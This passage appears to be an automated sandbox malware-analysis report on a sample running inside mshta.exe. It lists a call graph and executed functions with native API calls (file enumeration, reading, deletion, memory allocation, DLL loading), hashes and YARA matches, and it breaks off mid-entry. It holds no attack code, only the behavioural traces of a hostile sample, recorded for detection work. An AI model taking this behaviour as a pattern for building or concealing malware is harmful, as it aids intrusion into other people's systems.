99325 53f712 99326 548ef0 NtClose 99325->99326 99327 53f71c 99326->99327 99328 54afc0 RtlFreeHeap 99327->99328 99328->99308 99329 53f6b5 99329->99325 99330 5489b0 LdrInitializeThunk 99329->99330 99330->99329 99332 535ff5 99331->99332 99350 548850 99332->99350 99336 53f1dc 99335->99336 99337 534140 LdrLoadDll 99336->99337 99339 53f1fa 99337->99339 99338 53f203 99338->99314 99339->99338 99340 534140 LdrLoadDll 99339->99340 99341 53f2ce 99340->99341 99342 534140 LdrLoadDll 99341->99342 99343 53f32b 99341->99343 99342->99343 99343->99314 99345 53f115 99344->99345 99345->99322 99347 5489cd 99346->99347 99355 2ed2ba0 LdrInitializeThunk 99347->99355 99348 5489fd 99348->99329 99351 54886d 99350->99351 99354 2ed2c60 LdrInitializeThunk 99351->99354 99352 536069 99352->99309 99354->99352 99355->99348 99591 531ea0 99592 531eb6 99591->99592 99593 548530 LdrInitializeThunk 99592->99593 99594 531ed6 99593->99594 99597 548f80 99594->99597 99596 531eeb 99598 54900f 99597->99598 99599 548fae 99597->99599 99602 2ed2e80 LdrInitializeThunk 99598->99602 99599->99596 99600 549040 99600->99596 99602->99600 99356 548360 99357 5483ef 99356->99357 99359 54838e 99356->99359 99361 2ed2ee0 LdrInitializeThunk 99357->99361 99358 548420 99361->99358 99362 5484e0 99363 5484fa 99362->99363 99366 2ed2df0 LdrInitializeThunk 99363->99366 99364 548522 99366->99364 99367 548d60 99368 548e04 99367->99368 99370 548d8b 99367->99370 99369 548e1a NtReadFile 99368->99369 99371 545be0 99372 545c3a 99371->99372 99374 545c47 99372->99374 99375 5435f0 99372->99375 99382 54af30 99375->99382 99377 54373e 99377->99374 99378 543631 99378->99377 99379 534140 LdrLoadDll 99378->99379 99381 543677 99379->99381 99380 5436c0 Sleep 99380->99381 99381->99377 99381->99380 99385 549050 99382->99385 99384 54af61 99384->99378 99386 5490e2 99385->99386 99388 54907b 99385->99388 99387 5490f8 NtAllocateVirtualMemory 99386->99387 99387->99384 99388->99384 99389 54c1e0 99390 54afc0 RtlFreeHeap 99389->99390 99391 54c1f5 99390->99391 99603 541620 99608 541639 99603->99608 99604 5416c9 99605 541684 99606 54afc0 RtlFreeHeap 99605->99606 99607 541691 99606->99607 99608->99604 99608->99605 99609 5416c4 99608->99609 99610 54afc0 RtlFreeHeap 99609->99610 99610->99604 99611 53982f 99612 53983a 99611->99612 99613 539846 99612->99613 99614 54afc0 RtlFreeHeap 99612->99614 99614->99613 99392 2ed2ad0 LdrInitializeThunk

                Executed Functions

                Function 0053C210 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0053C2F4
                • FindNextFileW.KERNELBASE(?,00000010), ref: 0053C32F
                • FindClose.KERNELBASE(?), ref: 0053C33A
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: e3f9dc416226f3c3ecb00e5c05db92e1f0af19bfa3131f74ac5978e4ec8d997b
                • Instruction ID: 6451ad9cfe73ab5467504fc47a6c807fcf437ee265078c7086f0626da71be757
                • Opcode Fuzzy Hash: e3f9dc416226f3c3ecb00e5c05db92e1f0af19bfa3131f74ac5978e4ec8d997b
                • Instruction Fuzzy Hash: 2B315371500359BBDB20DB64CC89FFF7B7CEF84705F144458B549A7181DA70AA848BA1
                Function 00548BF0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                Download Yara Rule
                APIs
                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00548CEE
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: a03a26d11fbff19d5e0f5e9e74c92894df017d02df04e7302f6b34a55be3fca0
                • Instruction ID: 5e291ab0d5ce2aea15531a0d369d6b8f5939614c0a4f6668e95456073cd0957d
                • Opcode Fuzzy Hash: a03a26d11fbff19d5e0f5e9e74c92894df017d02df04e7302f6b34a55be3fca0
                • Instruction Fuzzy Hash: C031B1B5A00609ABDB04DF99D885EEFBBF9AF8C304F108109F919A3340D730A8518BA5
                Function 00548D60 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                Download Yara Rule
                APIs
                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00548E43
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 79f195d18e8dfd77fa293075082fc55903771dd9d482517675d6bad29e94cf4b
                • Instruction ID: 0542f713fe8de0aa2887076542c616aab70c1e5ed87fc6689c99bdf47dece2b9
                • Opcode Fuzzy Hash: 79f195d18e8dfd77fa293075082fc55903771dd9d482517675d6bad29e94cf4b
                • Instruction Fuzzy Hash: B231D8B5A00619AFDB14DF98D885EEFB7B9EF8C714F108219F918A7240D770A811CBA5
                Function 00549050 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(0053198E,?,00547B1F,00000000,00000004,00003000,?,?,?,?,?,00547B1F,0053198E,?,00547B1F,00000000), ref: 00549115
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 293d039baca88fa560f385584327714ed0b968801d43f2748c2161a9b62c20e3
                • Instruction ID: 13dbee30e0dd6a6d8db5baea2518736cbfdd4f74e65518b6c54b223b855a2e2f
                • Opcode Fuzzy Hash: 293d039baca88fa560f385584327714ed0b968801d43f2748c2161a9b62c20e3
                • Instruction Fuzzy Hash: D5212DB5A00609ABDB14DF98DC85EEFB7B9FF88714F108109F918A7240D770A911CBA5
                Function 00548E50 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 3cdfddb5db184aa6d1131c14b23e02ea293720d82e67bb9644d3c211cea3ed20
                • Instruction ID: 12c40893722d2ab7b0cb2dabadc5abcfcbe39c42aefd1c20daf214e206e6e44a
                • Opcode Fuzzy Hash: 3cdfddb5db184aa6d1131c14b23e02ea293720d82e67bb9644d3c211cea3ed20
                • Instruction Fuzzy Hash: AF11A071A40619BAE620EB64DC86FEF7BACEFC9714F008509F918A7280D7717901CBE5
                Function 00548EF0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule
                APIs
                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00548F24
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 28e8e41dbf0d9d0f9643fc0bcd4f763b03060fd7b7f20f079a40097d18982b6b
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: 8EE08C76650616BFD620FA59DC41FEBBBACEFC5724F418029FA08A7242C670B90587F4
                Function 02ED4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 07088e0c16607023014c369fa4c01bb6c302c1bea9d2e41e4bd059b0d079abe0
                • Instruction ID: b25c38237eff52d0e566a9cd9c40fa2c28b08791993ab4e08c35c5b1184588eb
                • Opcode Fuzzy Hash: 07088e0c16607023014c369fa4c01bb6c302c1bea9d2e41e4bd059b0d079abe0
                • Instruction Fuzzy Hash: 06900231645800129980B1584885547400597E0301B55D011E0474555C8A148A569361
                Function 02ED4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 67f32ade9ca59e2ec5b42bd5a5497252f14c8cf1b8f8ad5d82e9c6495cd7d7f7
                • Instruction ID: 019dcb51bcc931ff817672ea1ed253d209a5541083722fbe691c9f1720cd0c99
                • Opcode Fuzzy Hash: 67f32ade9ca59e2ec5b42bd5a5497252f14c8cf1b8f8ad5d82e9c6495cd7d7f7
                • Instruction Fuzzy Hash: D5900271641500424980B1584805407600597E1301395D115A05A4561C86188955D269
                Function 02ED2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 158e80f7354b08cb16e0cddef99f866794a4bdbdd641cb64283b139deda0c9cb
                • Instruction ID: 716a4083ed852f396b6d72ac28530d19b5ffbae37ba9070bb19270d21217740e
                • Opcode Fuzzy Hash: 158e80f7354b08cb16e0cddef99f866794a4bdbdd641cb64283b139deda0c9cb
                • Instruction Fuzzy Hash: F5900235261400020985F558060550B044597D6351395D015F1466591CC62189659321
                Function 02ED2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 33cad928f40de797ba3e067ecba05c51806f39d49bf0ebcd2a6b2542025d900b
                • Instruction ID: bf31b6c3768fe30ab4d5d6f8ccbbccffe97fe47651bde56e7be57ff51aa4e8ee
                • Opcode Fuzzy Hash: 33cad928f40de797ba3e067ecba05c51806f39d49bf0ebcd2a6b2542025d900b
                • Instruction Fuzzy Hash: 18900435351400030D45F55C07055070047C7D5351355D031F1075551CD731CD71D131
                Function 02ED2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: de26fb1425fc8eab314c287fc909047b8a1bcebdcdba3e1843a4fa44681be9be
                • Instruction ID: 3b17e3376de4fd9b80e4a211337446d9f6f2f0968f00999fdd034c1fe7ed729b
                • Opcode Fuzzy Hash: de26fb1425fc8eab314c287fc909047b8a1bcebdcdba3e1843a4fa44681be9be
                • Instruction Fuzzy Hash: 5790023124544842D980B1584405A47001587D0305F55D011A00B4695D96258E55F661
                Function 02ED2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3ecaed9a28c6e9e10322ad13b5b626d2ab11670dc1237e80f6153f34b73cea73
                • Instruction ID: 3648653788c24c1d745c4956ceb88bd76c26fb4a0e4044a734af4e7bc32aa789
                • Opcode Fuzzy Hash: 3ecaed9a28c6e9e10322ad13b5b626d2ab11670dc1237e80f6153f34b73cea73
                • Instruction Fuzzy Hash: A490023124140802D9C0B158440564B000587D1301F95D015A0075655DCA158B59B7A1
                Function 02ED2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b2d8f6f4aa92f6ef6c227b852dbd93a8f597d26f15db558b7c81253191880d0d
                • Instruction ID: 18fa499445f7c9f6e15123b158d2dfe000dd180286ca0c305cc4b823988b67e9
                • Opcode Fuzzy Hash: b2d8f6f4aa92f6ef6c227b852dbd93a8f597d26f15db558b7c81253191880d0d
                • Instruction Fuzzy Hash: 9F90023164540802D990B1584415747000587D0301F55D011A0074655D87558B55B6A1
                Function 02ED2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 50fb61f3d69f6f289be1bcab1ced896b576fcb5768f2e38f4da6e5d6ced439ab
                • Instruction ID: 41e0b4f33edc5c5e926322919a990ac4034c24b57413331d0722e1718782d6dd
                • Opcode Fuzzy Hash: 50fb61f3d69f6f289be1bcab1ced896b576fcb5768f2e38f4da6e5d6ced439ab
                • Instruction Fuzzy Hash: BE900271242400034945B1584415617400A87E0201B55D021E1064591DC5258991A125
                Function 02ED2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: aa695827fabe02e747effaaeb50c18326fe5f98d67cae6000b069264c224810b
                • Instruction ID: fe50e48ce508164aca17a0201b63354147690c1d2fb8c24ec0ff587b7b662ece
                • Opcode Fuzzy Hash: aa695827fabe02e747effaaeb50c18326fe5f98d67cae6000b069264c224810b
                • Instruction Fuzzy Hash: 8090027124180403D980B5584805607000587D0302F55D011A20B4556E8A298D51A135
                Function 02ED2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: dc84398325449800f32a98c1523f4418fdeb37d830531c4ad052fa7e3d65106b
                • Instruction ID: 5d95be9b1f27ad78210768049564e53fe2fc818f9db821d9517583df1c176ac4
                • Opcode Fuzzy Hash: dc84398325449800f32a98c1523f4418fdeb37d830531c4ad052fa7e3d65106b
                • Instruction Fuzzy Hash: 3A90023164140502D941B1584405617000A87D0241F95D022A1074556ECA258A92E131
                Function 02ED2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 32eab6c2173e61c573a9d88a49ee776c2b12c72e30ffd1d77feb43266520bcfd
                • Instruction ID: 9de3572372a84dfab7d4be05f5765f23e2b11a49bdbfbc14c0427453fa3aa7d0
                • Opcode Fuzzy Hash: 32eab6c2173e61c573a9d88a49ee776c2b12c72e30ffd1d77feb43266520bcfd
                • Instruction Fuzzy Hash: 2F900231251C0042DA40B5684C15B07000587D0303F55D115A01A4555CC91589619521
                Function 02ED2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 69ac2920d9504e0dac9fb200426c1788ecafe6fb111bedeec59cc3c3d35c6d10
                • Instruction ID: 5134836a397d0d00ea8597c709434d2f55cc734bf7d62d56909a67c230a6c417
                • Opcode Fuzzy Hash: 69ac2920d9504e0dac9fb200426c1788ecafe6fb111bedeec59cc3c3d35c6d10
                • Instruction Fuzzy Hash: 76900231641400424980B16888459074005ABE1211755D121A09E8551D855989659665
                Function 02ED2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1737da65a262a4af81d0d186a50162cbd94bc31a8271f91f3f242743704871ab
                • Instruction ID: 2465a6f6ed9d6a08a7ffa1c55b1b7b7b97077e9b81a6f1c713f00723f0e35ebb
                • Opcode Fuzzy Hash: 1737da65a262a4af81d0d186a50162cbd94bc31a8271f91f3f242743704871ab
                • Instruction Fuzzy Hash: 1090027138140442D940B1584415B070005C7E1301F55D015E10B4555D8619CD52A126
                Function 02ED2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1564503d16ed68130f14405808f30f6192f97f458e1d95e17105fc9162cf3ca3
                • Instruction ID: 3f1d80d9fdb068d3f128ec8bb10ff5f8dbcba9bdc0d3615300a515cce7e59c37
                • Opcode Fuzzy Hash: 1564503d16ed68130f14405808f30f6192f97f458e1d95e17105fc9162cf3ca3
                • Instruction Fuzzy Hash: 3990023124140402D940B5985409647000587E0301F55E011A5074556EC6658991A131
                Function 02ED2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1ff241c343d021a5b2f129b3b557e3a054ea433e41875f9ea37fdbf2958822d5
                • Instruction ID: 85ed84cfde80f4c3707550890d67a6c2ee2db7e836a6db29a5beb800f98f9ec0
                • Opcode Fuzzy Hash: 1ff241c343d021a5b2f129b3b557e3a054ea433e41875f9ea37fdbf2958822d5
                • Instruction Fuzzy Hash: 2F90023124140842D940B1584405B47000587E0301F55D016A0174655D8615C951B521
                Function 02ED2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2f3665390fab791e03490a726f5c229e24f1c3d59ceeb9df3a7de543600ace7c
                • Instruction ID: 6c7922382ef829c07b978f04e65bb9a4dac64eccb9b8b123da70039d7559464a
                • Opcode Fuzzy Hash: 2f3665390fab791e03490a726f5c229e24f1c3d59ceeb9df3a7de543600ace7c
                • Instruction Fuzzy Hash: 1D90023124148802D950B158840574B000587D0301F59D411A4474659D86958991B121
                Function 02ED2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d19a2011c19d49ad6fe25ac193781cbaca08666076bc8187111f76af64bf8a3c
                • Instruction ID: a15e24965101ea79be8737095251df9e3650af00e800068fd4b575ccde45b081
                • Opcode Fuzzy Hash: d19a2011c19d49ad6fe25ac193781cbaca08666076bc8187111f76af64bf8a3c
                • Instruction Fuzzy Hash: D390023124140413D951B1584505707000987D0241F95D412A0474559D96568A52E121
                Function 02ED2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
